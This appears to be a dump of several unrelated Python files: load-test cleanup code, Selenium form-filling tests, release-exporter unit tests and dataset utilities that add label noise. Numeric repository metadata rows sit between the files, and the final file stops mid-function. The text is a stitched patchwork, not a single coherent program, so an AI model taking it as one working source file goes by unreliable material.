env = ConfigLoader(os.getenv("system_file", "./system.yaml")).get_config()
self.email = 'user{0}@demo.ai'.format(USER_INDEX)
self.username = self.email
self.first_name = 'load'
self.last_name = 'test'
self.password = env['security']['test_user_password']
self.account = 'user{0}'.format(USER_INDEX)
self.bot = 'user{0}'.format(USER_INDEX)
USER_INDEX += 1
def on_stop(self):
logging.info("Cleaning up database..")
try:
os.environ["system_file"] = "./tests/testing_data/system.yaml"
env = ConfigLoader(os.getenv("system_file", "./system.yaml")).get_config()
logging.info("Connecting to: " + env['database']["stress_test"])
connect(host=env['database']["stress_test"])
User.objects(email=self.username).delete()
Bot.objects(name=self.bot).delete()
Account.objects(name=self.account).delete()
logging.info("Cleanup complete")
disconnect()
except Exception as e:
logging.error(e)
| 52.727666 | 113 | 0.505889 | 3,622 | 36,593 | 5.011596 | 0.057427 | 0.105773 | 0.114588 | 0.123402 | 0.869822 | 0.851036 | 0.84134 | 0.806468 | 0.79578 | 0.785754 | 0 | 0.015934 | 0.362009 | 36,593 | 693 | 114 | 52.803752 | 0.761587 | 0.019075 | 0 | 0.747856 | 0 | 0 | 0.147335 | 0.023226 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051458 | false | 0.008576 | 0.015437 | 0 | 0.109777 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c6bcd2c329e60ecda6730ec3cf2764b950b20806 | 4,248 | py | Python | test_script.py | ghatoledipak/Heart-Disease-Prediction-KNN | 3eb44975ad92dfa600b875bfc7f79f5d0c971d91 | [
"MIT"
] | null | null | null | test_script.py | ghatoledipak/Heart-Disease-Prediction-KNN | 3eb44975ad92dfa600b875bfc7f79f5d0c971d91 | [
"MIT"
] | null | null | null | test_script.py | ghatoledipak/Heart-Disease-Prediction-KNN | 3eb44975ad92dfa600b875bfc7f79f5d0c971d91 | [
"MIT"
] | 3 | 2021-02-12T16:40:51.000Z | 2021-12-28T18:12:33.000Z | from selenium import webdriver
from selenium.webdriver.support.ui import Select
import time
def knn():
driver = webdriver.Chrome('chromedriver.exe')
driver.get('http://127.0.0.1:5000/')
time.sleep(2)
home_btn = driver.find_element_by_id('btn3')
home_btn.click()
age = driver.find_element_by_id('age')
age.send_keys('54')
select = Select(driver.find_element_by_id('sex'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('cp'))
select.select_by_index(1)
bps = driver.find_element_by_id('trestbps')
bps.send_keys('89')
chol = driver.find_element_by_id('chol')
chol.send_keys('69')
select = Select(driver.find_element_by_id('fbs'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('restecg'))
select.select_by_index(1)
thalach = driver.find_element_by_id('thalach')
thalach.send_keys('88')
exang = driver.find_element_by_id('exang')
exang.send_keys('55')
select = Select(driver.find_element_by_id('oldpeak'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('slope'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('ca'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('thal'))
select.select_by_index(1)
time.sleep(3)
submit_button = driver.find_element_by_id('subbtn')
submit_button.click()
time.sleep(3)
def gradient():
driver = webdriver.Chrome('chromedriver.exe')
driver.get('http://127.0.0.1:5000/')
time.sleep(3)
home_btn = driver.find_element_by_id('btn1')
home_btn.click()
age = driver.find_element_by_id('age')
age.send_keys('54')
select = Select(driver.find_element_by_id('sex'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('cp'))
select.select_by_index(1)
bps = driver.find_element_by_id('trestbps')
bps.send_keys('89')
chol = driver.find_element_by_id('chol')
chol.send_keys('69')
select = Select(driver.find_element_by_id('fbs'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('restecg'))
select.select_by_index(1)
thalach = driver.find_element_by_id('thalach')
thalach.send_keys('88')
exang = driver.find_element_by_id('exang')
exang.send_keys('55')
select = Select(driver.find_element_by_id('oldpeak'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('slope'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('ca'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('thal'))
select.select_by_index(1)
time.sleep(3)
submit_button = driver.find_element_by_id('subbtn')
submit_button.click()
time.sleep(5)
def random_forest():
driver = webdriver.Chrome('chromedriver.exe')
driver.get('http://127.0.0.1:5000/')
time.sleep(3)
home_btn = driver.find_element_by_id('btn2')
home_btn.click()
age = driver.find_element_by_id('age')
age.send_keys('54')
select = Select(driver.find_element_by_id('sex'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('cp'))
select.select_by_index(1)
bps = driver.find_element_by_id('trestbps')
bps.send_keys('89')
chol = driver.find_element_by_id('chol')
chol.send_keys('69')
select = Select(driver.find_element_by_id('fbs'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('restecg'))
select.select_by_index(1)
thalach = driver.find_element_by_id('thalach')
thalach.send_keys('88')
exang = driver.find_element_by_id('exang')
exang.send_keys('55')
select = Select(driver.find_element_by_id('oldpeak'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('slope'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('ca'))
select.select_by_index(1)
select = Select(driver.find_element_by_id('thal'))
select.select_by_index(1)
time.sleep(3)
submit_button = driver.find_element_by_id('subbtn')
submit_button.click()
time.sleep(5)
gradient()
knn()
random_forest() | 25.902439 | 57 | 0.697269 | 633 | 4,248 | 4.344392 | 0.097946 | 0.209455 | 0.278182 | 0.310909 | 0.946182 | 0.946182 | 0.946182 | 0.936 | 0.936 | 0.936 | 0 | 0.027042 | 0.164313 | 4,248 | 164 | 58 | 25.902439 | 0.747606 | 0 | 0 | 0.885965 | 0 | 0 | 0.083314 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.026316 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c6bf225e5d299e6da87ac463b8e8daa46e536e71 | 37 | py | Python | dicomanonymizer/__init__.py | emeyer/dicom-anonymizer | 0ce618626aaf03891da6b85b205818a45b7ff7d1 | [
"BSD-3-Clause"
] | null | null | null | dicomanonymizer/__init__.py | emeyer/dicom-anonymizer | 0ce618626aaf03891da6b85b205818a45b7ff7d1 | [
"BSD-3-Clause"
] | null | null | null | dicomanonymizer/__init__.py | emeyer/dicom-anonymizer | 0ce618626aaf03891da6b85b205818a45b7ff7d1 | [
"BSD-3-Clause"
] | null | null | null | from .simpledicomanonymizer import *
| 18.5 | 36 | 0.837838 | 3 | 37 | 10.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
05be165851687090fa019ed48f4c3ce3d69f272f | 150 | py | Python | loldib/getratings/models/NA/na_irelia/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_irelia/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_irelia/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from .na_irelia_top import *
from .na_irelia_jng import *
from .na_irelia_mid import *
from .na_irelia_bot import *
from .na_irelia_sup import *
| 25 | 29 | 0.766667 | 25 | 150 | 4.2 | 0.36 | 0.285714 | 0.571429 | 0.685714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 150 | 5 | 30 | 30 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
05e846b8c7a4efe9595130643fa3c9cb2878ea19 | 5,641 | py | Python | tests/test_formatter.py | akshaybabloo/release-exporter-old | 91ed54f792f0cefbb1c09307d92c7f0479853d0f | [
"MIT"
] | 15 | 2018-10-27T16:58:52.000Z | 2021-12-15T08:58:50.000Z | tests/test_formatter.py | akshaybabloo/release-exporter | 39c3e4bec836889ac79e0b2739bdb14635c94c34 | [
"MIT"
] | 47 | 2018-01-22T13:09:42.000Z | 2022-03-29T17:02:14.000Z | tests/test_formatter.py | akshaybabloo/release-exporter-old | 91ed54f792f0cefbb1c09307d92c7f0479853d0f | [
"MIT"
] | 6 | 2018-02-16T13:30:47.000Z | 2021-12-16T15:15:54.000Z | import io
import os
import unittest
from unittest.mock import patch
from release_exporter.formatter import github, gitlab
# ------------------------- GitHub --------------------------
class TestGitHubFormatMarkdown(unittest.TestCase):
def setUp(self):
self.github_format = github(force=True, token=os.environ['GITHUB_TOKEN'],
repo_url='https://github.com/akshaybabloo/release-exporter')
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_1(self, n, expected_output, mock_stdout):
request = self.github_format._converter()
self.assertIn(expected_output, mock_stdout.getvalue())
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_2(self, n, expected_output, mock_stdout):
request = self.github_format.write_markdown()
self.assertIn(expected_output, mock_stdout.getvalue())
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_3(self, n, expected_output, mock_stdout):
request = self.github_format.write()
self.assertIn(expected_output, mock_stdout.getvalue())
def test_convert(self):
request = self.github_format._converter()
self.assertIsInstance(request, tuple)
self.assertIn('changelog', request[0])
def test_output(self):
self.assert_stdout_1('', 'Provider')
def test_write_markdown(self):
self.assert_stdout_2('', 'Done')
def test_write(self):
self.assert_stdout_3('', 'created')
class TestGitHubFormatJson(unittest.TestCase):
def setUp(self):
self.github_format = github(force=True, token=os.environ['GITHUB_TOKEN'],
repo_url='https://github.com/akshaybabloo/release-exporter', file_type='json')
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_1(self, n, expected_output, mock_stdout):
request = self.github_format._converter()
self.assertIn(expected_output, mock_stdout.getvalue())
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_2(self, n, expected_output, mock_stdout):
request = self.github_format.write_json()
self.assertIn(expected_output, mock_stdout.getvalue())
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_3(self, n, expected_output, mock_stdout):
request = self.github_format.write()
self.assertIn(expected_output, mock_stdout.getvalue())
def test_convert(self):
request = self.github_format._converter()
self.assertIs(request, None)
self.assertIn('provider', self.github_format._dict_repo_template())
def test_output(self):
self.assert_stdout_1('', 'Provider')
def test_write_markdown(self):
self.assert_stdout_2('', 'Done')
def test_write(self):
self.assert_stdout_3('', 'created')
# ------------------------- GitLab --------------------------
class TestGitLabFormatMarkdown(unittest.TestCase):
def setUp(self):
self.gitlab_format = gitlab(force=True, token=os.environ['GITLAB_TOKEN'],
repo_url='https://gitlab.com/akshaybabloo/test-releases')
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_1(self, n, expected_output, mock_stdout):
request = self.gitlab_format._converter()
self.assertIn(expected_output, mock_stdout.getvalue())
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_2(self, n, expected_output, mock_stdout):
request = self.gitlab_format.write_markdown()
self.assertIn(expected_output, mock_stdout.getvalue())
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_3(self, n, expected_output, mock_stdout):
request = self.gitlab_format.write()
self.assertIn(expected_output, mock_stdout.getvalue())
def test_convert(self):
request = self.gitlab_format._converter()
self.assertIsInstance(request, tuple)
self.assertIn('changelog', request[0])
def test_output(self):
self.assert_stdout_1('', 'Provider')
def test_write_markdown(self):
self.assert_stdout_2('', 'Done')
def test_write(self):
self.assert_stdout_3('', 'created')
class TestGitLabFormatJson(unittest.TestCase):
def setUp(self):
self.gitlab_format = gitlab(force=True, token=os.environ['GITLAB_TOKEN'],
repo_url='https://gitlab.com/akshaybabloo/test-releases', file_type='json')
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_1(self, n, expected_output, mock_stdout):
request = self.gitlab_format._converter()
self.assertIn(expected_output, mock_stdout.getvalue())
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_2(self, n, expected_output, mock_stdout):
request = self.gitlab_format.write_json()
self.assertIn(expected_output, mock_stdout.getvalue())
@patch('sys.stdout', new_callable=io.StringIO)
def assert_stdout_3(self, n, expected_output, mock_stdout):
request = self.gitlab_format.write()
self.assertIn(expected_output, mock_stdout.getvalue())
def test_convert(self):
request = self.gitlab_format._converter()
self.assertIs(request, None)
self.assertIn('provider', self.gitlab_format._dict_repo_template())
def test_output(self):
self.assert_stdout_1('', 'Provider')
def test_write_markdown(self):
self.assert_stdout_2('', 'Done')
def test_write(self):
self.assert_stdout_3('', 'created')
| 35.037267 | 114 | 0.672221 | 674 | 5,641 | 5.360534 | 0.097923 | 0.079712 | 0.119568 | 0.159424 | 0.937725 | 0.937725 | 0.937725 | 0.937725 | 0.937725 | 0.937725 | 0 | 0.005693 | 0.190392 | 5,641 | 160 | 115 | 35.25625 | 0.785417 | 0.021096 | 0 | 0.825688 | 0 | 0 | 0.085523 | 0 | 0 | 0 | 0 | 0 | 0.40367 | 1 | 0.293578 | false | 0 | 0.045872 | 0 | 0.376147 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
af3cc132f7a0327d8578f8031ae3351fdc7a5b69 | 1,613 | py | Python | PI/Entrega3/test_taxiDriver.py | VergaraC/agents | c8ebeba018a6fbe85cd7ed616ef0ca6c6420fe42 | [
"MIT"
] | null | null | null | PI/Entrega3/test_taxiDriver.py | VergaraC/agents | c8ebeba018a6fbe85cd7ed616ef0ca6c6420fe42 | [
"MIT"
] | null | null | null | PI/Entrega3/test_taxiDriver.py | VergaraC/agents | c8ebeba018a6fbe85cd7ed616ef0ca6c6420fe42 | [
"MIT"
] | null | null | null | from adaptador import MeuTaxi
from datetime import datetime
import gym
env = gym.make("Taxi-v3").env
def test_1():
state = env.reset()
state = env.encode(3, 2, 1, 0)
env.render()
inicio = datetime.now()
result = MeuTaxi(env.desc, env.decode(state))
fim = datetime.now()
print(fim - inicio)
assert result.path()[-1]==5
def test_2():
state = env.reset()
state = env.encode(3, 1, 2, 0)
env.render()
inicio = datetime.now()
result = MeuTaxi(env.desc, env.decode(state))
fim = datetime.now()
print(fim - inicio)
assert result.path()[-1]==5
def test_3():
state = env.reset()
state = env.encode(3, 1, 3, 0)
env.render()
inicio = datetime.now()
result = MeuTaxi(env.desc, env.decode(state))
fim = datetime.now()
print(fim - inicio)
assert result.path()[-1]==5
def test_4():
state = env.reset()
state = env.encode(3, 3, 0, 1)
env.render()
inicio = datetime.now()
result = MeuTaxi(env.desc, env.decode(state))
fim = datetime.now()
print(fim - inicio)
assert result.path()[-1]==5
def test_5():
state = env.reset()
state = env.encode(3, 1, 1, 2)
env.render()
inicio = datetime.now()
result = MeuTaxi(env.desc, env.decode(state))
fim = datetime.now()
print(fim - inicio)
assert result.path()[-1]==5
def test_6():
state = env.reset()
state = env.encode(3, 1, 3, 3)
env.render()
inicio = datetime.now()
result = MeuTaxi(env.desc, env.decode(state))
fim = datetime.now()
print(fim - inicio)
assert result.path()[-1]==5 | 24.815385 | 49 | 0.592684 | 232 | 1,613 | 4.094828 | 0.137931 | 0.101053 | 0.082105 | 0.113684 | 0.892632 | 0.892632 | 0.892632 | 0.833684 | 0.772632 | 0.709474 | 0 | 0.035016 | 0.238686 | 1,613 | 65 | 50 | 24.815385 | 0.738599 | 0 | 0 | 0.724138 | 0 | 0 | 0.004337 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 1 | 0.103448 | false | 0 | 0.051724 | 0 | 0.155172 | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
af653687d25212ec720bbbf2a2c2ca6901785f11 | 27,072 | py | Python | distil/utils/dataset.py | SatyadevNtv/distil | c8c3489920a24537a849eb8446efc9c2e19ab193 | [
"MIT"
] | 1 | 2021-08-15T07:50:46.000Z | 2021-08-15T07:50:46.000Z | distil/utils/dataset.py | chipsh/distil | c8c3489920a24537a849eb8446efc9c2e19ab193 | [
"MIT"
] | null | null | null | distil/utils/dataset.py | chipsh/distil | c8c3489920a24537a849eb8446efc9c2e19ab193 | [
"MIT"
] | null | null | null | import math
import numpy as np
import torch
from torchvision import datasets
from torchvision import transforms
from PIL import Image
def add_label_noise(y_trn, num_cls, noise_ratio=0.8):
"""
Adds noise to the specified list of labels.
This functionality is taken from CORDS and
applied here.
Parameters
----------
y_trn : list
The list of labels to add noise.
num_cls : int
The number of classes possible in the list.
noise_ratio : float, optional
The percentage of labels to modify. The default is 0.8.
Returns
-------
y_trn : list
The list of now-noisy labels
"""
noise_size = int(len(y_trn) * noise_ratio)
noise_indices = np.random.choice(np.arange(len(y_trn)), size=noise_size, replace=False)
y_trn[noise_indices] = np.random.choice(np.arange(num_cls), size=noise_size, replace=True)
return y_trn
def get_imbalanced_idx(y_trn, num_cls, class_ratio=0.6):
"""
Returns a list of indices of the supplied dataset that
constitute a class-imbalanced subset of the supplied
dataset. This functionality is taken from CORDS and
applied here.
Parameters
----------
y_trn : numpy ndarray
The label set to choose imbalance.
num_cls : int
The number of classes possible in the list.
class_ratio : float, optional
The percentage of classes to affect. The default is 0.6.
Returns
-------
subset_idxs : list
The list of indices of the supplied dataset that
constitute a class-imbalanced subset
"""
# Calculate the minimum samples in a class and take a small fraction of that number as the new sample
# count for that class
samples_per_class = torch.zeros(num_cls)
for i in range(num_cls):
samples_per_class[i] = len(torch.where(torch.Tensor(y_trn) == i)[0])
min_samples = int(torch.min(samples_per_class) * 0.1)
# Generate affected classes based on the specified class ratio
selected_classes = np.random.choice(np.arange(num_cls), size=int(class_ratio * num_cls), replace=False)
# For each class, either add the full class to the dataset (if not selected) or add only min_samples
# samples from that class to the dataset
for i in range(num_cls):
if i == 0:
if i in selected_classes:
subset_idxs = list(
np.random.choice(torch.where(torch.Tensor(y_trn) == i)[0].cpu().numpy(),
size=min_samples,
replace=False))
else:
subset_idxs = list(torch.where(torch.Tensor(y_trn) == i)[0].cpu().numpy())
else:
if i in selected_classes:
batch_subset_idxs = list(
np.random.choice(torch.where(torch.Tensor(y_trn) == i)[0].cpu().numpy(),
size=min_samples,
replace=False))
else:
batch_subset_idxs = list(torch.where(torch.Tensor(y_trn) == i)[0].cpu().numpy())
subset_idxs.extend(batch_subset_idxs)
return subset_idxs
def make_data_redundant(X,Y,intial_bud,unique_points= 5000,amtRed=2):
"""
Modifies the input dataset in such a way that only X.shape(0)/amtRed are original
points and rest are repeated or redundant.
Parameters
----------
X : numpy ndarray
The feature set to be made redundant.
Y : numpy ndarray
The label set corresponding to the X.
intial_bud : int
Number of inital points that are assumed to be labled.
unique_points: int
Number of points to be kept unique in unlabled pool.
amtRed : float, optional
Factor that determines redundancy. The default is 2.
Returns
-------
X : numpy ndarray
Modified feature set.
"""
unique_ind = intial_bud + unique_points
classes,no_elements = np.unique(Y[unique_ind:], return_counts=True)
for cl in range(len(classes)):
retain = math.ceil(no_elements[cl]/amtRed)
idxs = np.where(Y[unique_ind:] == classes[cl])[0]
idxs += unique_ind
for i in range(math.ceil(amtRed)):
if i == 0:
idxs_rep = idxs[:retain]
else:
idxs_rep = np.concatenate((idxs_rep,idxs[:retain]),axis=0)
X[idxs] = X[idxs_rep[:no_elements[cl]]]
return X
def make_aug_data_redundant(X,Y,intial_bud,unique_points= 5000,amtRed=2):
"""
Modifies the input dataset in such a way that only X.shape(0)/amtRed are original
points and rest are agumented versions of original.
Parameters
----------
X : numpy ndarray
The feature set to be made redundant.
Y : numpy ndarray
The label set corresponding to the X.
intial_bud : int
Number of inital points that are assumed to be labled.
unique_points: int
Number of points to be kept unique in unlabled pool.
amtRed : float, optional
Factor that determines redundancy. The default is 2.
Returns
-------
X : numpy ndarray
Modified feature set.
"""
unique_ind = intial_bud + unique_points
classes,no_elements = np.unique(Y[unique_ind:], return_counts=True)
crop_transform = transforms.RandomCrop(X.shape[1], padding=5)
trans_transform = transforms.RandomAffine(degrees=0, translate=(0.5, 0.5))
for cl in range(len(classes)):
retain = math.ceil(no_elements[cl]/amtRed)
idxs = np.where(Y[unique_ind:] == classes[cl])[0]
idxs += unique_ind
for i in range(1,math.ceil(amtRed)):
for j in range(retain):
if len(idxs) <= i*retain+j:
break
img = Image.fromarray(X[idxs[j]])
if j%2 == 0:
img = crop_transform(img)
else:
img = trans_transform(img)
X[idxs[i*retain+j]] = np.asarray(img)
#X[idxs] = X[idxs_rep[:no_elements[cl]]]
return X
def get_dataset(name, path, tr_load_args = None, te_load_args = None):
"""
Loads dataset
Parameters
----------
name: str
Name of the dataset to be loaded. Supports MNIST and CIFAR10
path: str
Path to save the downloaded dataset
tr_load_args: dict
String dictionary for train distribution shift loading
te_load_args: dict
String dictionary for test distribution shift loading
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
if name == 'MNIST':
return get_MNIST(path, tr_load_args, te_load_args)
elif name == 'KMNIST':
return get_KMNIST(path, tr_load_args, te_load_args)
elif name == 'FASHION_MNIST':
return get_FASHION_MNIST(path, tr_load_args, te_load_args)
elif name == 'CIFAR10':
return get_CIFAR10(path, tr_load_args, te_load_args)
elif name == 'CIFAR100':
return get_CIFAR100(path, tr_load_args, te_load_args)
elif name == 'SVHN':
return get_SVHN(path, tr_load_args, te_load_args)
elif name == 'STL10':
return get_STL10(path, tr_load_args, te_load_args)
def get_SVHN(path, tr_load_args = None, te_load_args = None):
"""
Downloads SVHN dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the SVHN dataset
data_tr = datasets.SVHN(path + '/SVHN', split="train", download=True)
data_te = datasets.SVHN(path + '/SVHN', split="test", download=True)
# Obtain the raw data
X_tr = data_tr.data
Y_tr = data_tr.labels
X_te = data_te.data
Y_te = data_te.labels
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_MNIST(path, tr_load_args = None, te_load_args = None):
"""
Downloads MNIST dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the MNIST dataset
data_tr = datasets.MNIST(path + '/MNIST', train=True, download=True)
data_te = datasets.MNIST(path + '/MNIST', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data.numpy()
Y_tr = data_tr.targets.numpy()
X_te = data_te.data.numpy()
Y_te = data_te.targets.numpy()
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_KMNIST(path, tr_load_args = None, te_load_args = None):
"""
Downloads KMNIST dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the KMNIST dataset
data_tr = datasets.KMNIST(path + '/KMNIST', train=True, download=True)
data_te = datasets.KMNIST(path + '/KMNIST', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data.numpy()
Y_tr = data_tr.targets.numpy()
X_te = data_te.data.numpy()
Y_te = data_te.targets.numpy()
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
